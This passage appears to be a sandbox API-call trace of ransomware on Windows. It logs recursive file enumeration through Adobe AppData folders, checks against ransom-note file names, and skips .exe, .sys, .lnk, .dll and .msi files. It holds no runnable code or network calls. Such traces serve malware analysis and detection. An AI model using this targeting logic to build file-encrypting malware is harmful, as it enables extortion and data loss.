HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0080.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0080.556] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.558] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.558] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.558] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.558] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.558] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.js", cAlternateFileName="")) returned 1 [0080.558] lstrcmpW (lpString1="glob.js", lpString2=".") returned 1 [0080.558] lstrcmpW (lpString1="glob.js", lpString2="..") returned 1 [0080.558] lstrcmpiW (lpString1="glob.js", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.558] lstrcmpiW (lpString1="glob.js", lpString2="Decryptor_Info.hta") returned 1 [0080.558] PathFindExtensionW (pszPath="glob.js") returned=".js" [0080.558] lstrcmpiW (lpString1=".js", lpString2=".exe") returned 1 [0080.558] lstrcmpiW (lpString1=".js", lpString2=".sys") returned -1 [0080.558] lstrcmpiW (lpString1=".js", lpString2=".lnk") returned -1 [0080.558] lstrcmpiW (lpString1=".js", lpString2=".dll") returned 1 [0080.558] lstrcmpiW (lpString1=".js", lpString2=".msi") returned -1 [0080.558] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x709cc0 [0080.559] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75c000 [0080.559] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709cc0 | out: hHeap=0x6d0000) returned 1 [0080.559] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9590 [0080.559] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c000 | out: hHeap=0x6d0000) returned 1 [0080.559] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.settings.js", cAlternateFileName="GLOBSE~1.JS")) returned 1 [0080.559] lstrcmpW (lpString1="glob.settings.js", lpString2=".") returned 1 [0080.559] lstrcmpW (lpString1="glob.settings.js", lpString2="..") returned 1 [0080.559] lstrcmpiW (lpString1="glob.settings.js", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.559] lstrcmpiW (lpString1="glob.settings.js", lpString2="Decryptor_Info.hta") returned 1 [0080.559] PathFindExtensionW (pszPath="glob.settings.js") returned=".js" [0080.559] lstrcmpiW (lpString1=".js", lpString2=".exe") returned 1 [0080.559] lstrcmpiW (lpString1=".js", lpString2=".sys") returned -1 [0080.559] lstrcmpiW (lpString1=".js", lpString2=".lnk") returned -1 [0080.559] lstrcmpiW (lpString1=".js", lpString2=".dll") returned 1 [0080.559] lstrcmpiW (lpString1=".js", lpString2=".msi") returned -1 [0080.559] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x709cc0 [0080.559] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75c000 [0080.560] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709cc0 | out: hHeap=0x6d0000) returned 1 [0080.560] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x709cc0 [0080.560] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c000 | out: hHeap=0x6d0000) returned 1 [0080.560] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.settings.js", cAlternateFileName="GLOBSE~1.JS")) returned 0 [0080.560] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.560] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8cdc00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0080.560] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0080.560] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0080.560] lstrlenW (lpString="Security") returned 8 [0080.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Security" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0080.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0080.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0080.560] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.561] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.561] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8cdc00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.561] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.561] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.561] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda8cdc00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8f3d60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x1517, dwReserved0=0x0, dwReserved1=0x0, cFileName="addressbook.acrodata", cAlternateFileName="ADDRES~1.ACR")) returned 1 [0080.561] lstrcmpW (lpString1="addressbook.acrodata", lpString2=".") returned 1 [0080.561] lstrcmpW (lpString1="addressbook.acrodata", lpString2="..") returned 1 [0080.561] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.561] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Decryptor_Info.hta") returned -1 [0080.561] PathFindExtensionW (pszPath="addressbook.acrodata") returned=".acrodata" [0080.561] lstrcmpiW (lpString1=".acrodata", lpString2=".exe") returned -1 [0080.562] lstrcmpiW (lpString1=".acrodata", lpString2=".sys") returned -1 [0080.562] lstrcmpiW (lpString1=".acrodata", lpString2=".lnk") returned -1 [0080.562] lstrcmpiW (lpString1=".acrodata", lpString2=".dll") returned -1 [0080.562] lstrcmpiW (lpString1=".acrodata", lpString2=".msi") returned -1 [0080.562] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x709d88 [0080.562] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75c000 [0080.562] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709d88 | out: hHeap=0x6d0000) returned 1 [0080.562] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x709d88 [0080.562] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c000 | out: hHeap=0x6d0000) returned 1 [0080.562] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda5adf20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 1 [0080.562] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0080.562] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0080.562] lstrlenW (lpString="CRLCache") returned 8 [0080.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="CRLCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0080.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0080.562] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0080.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x75c000 [0080.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x75c000, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda5adf20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.566] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.566] FindNextFileW (in: hFindFile=0x75c000, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda5adf20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefc97c0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", cAlternateFileName="48B764~1.CRL")) returned 1 [0080.566] lstrcmpW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2=".") returned 1 [0080.566] lstrcmpW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="..") returned 1 [0080.566] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.566] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Decryptor_Info.hta") returned -1 [0080.566] PathFindExtensionW (pszPath="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned=".crl" [0080.566] lstrcmpiW (lpString1=".crl", lpString2=".exe") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".msi") returned -1 [0080.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9648 [0080.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x76c048 [0080.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9648 | out: hHeap=0x6d0000) returned 1 [0080.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x76c158 [0080.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c048 | out: hHeap=0x6d0000) returned 1 [0080.567] FindNextFileW (in: hFindFile=0x75c000, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 1 [0080.567] lstrcmpW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2=".") returned 1 [0080.567] lstrcmpW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="..") returned 1 [0080.567] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.567] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Decryptor_Info.hta") returned -1 [0080.567] PathFindExtensionW (pszPath="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned=".crl" [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".exe") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0080.567] lstrcmpiW (lpString1=".crl", lpString2=".msi") returned -1 [0080.568] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9648 [0080.568] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x76c048 [0080.568] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9648 | out: hHeap=0x6d0000) returned 1 [0080.568] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x76c260 [0080.568] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c048 | out: hHeap=0x6d0000) returned 1 [0080.568] FindNextFileW (in: hFindFile=0x75c000, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 0 [0080.568] FindClose (in: hFindFile=0x75c000 | out: hFindFile=0x75c000) returned 1 [0080.570] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 0 [0080.570] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.570] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 0 [0080.570] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0080.570] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefa3660, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x9347, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cAlternateFileName="A9B821~1.CRL")) returned 0 [0080.570] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0080.570] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0080.570] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0080.570] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0080.570] lstrlenW (lpString="Flash Player") returned 12 [0080.571] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player" [0080.571] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" [0080.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0080.571] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.575] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.575] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.578] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.578] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0080.579] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0080.579] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0080.579] lstrlenW (lpString="AssetCache") returned 10 [0080.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0080.579] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0080.579] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0080.579] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0080.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.754] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.757] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D5NTRC6R", cAlternateFileName="")) returned 1 [0080.757] lstrcmpW (lpString1="D5NTRC6R", lpString2=".") returned 1 [0080.757] lstrcmpW (lpString1="D5NTRC6R", lpString2="..") returned 1 [0080.757] lstrlenW (lpString="D5NTRC6R") returned 8 [0080.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="D5NTRC6R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R" [0080.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 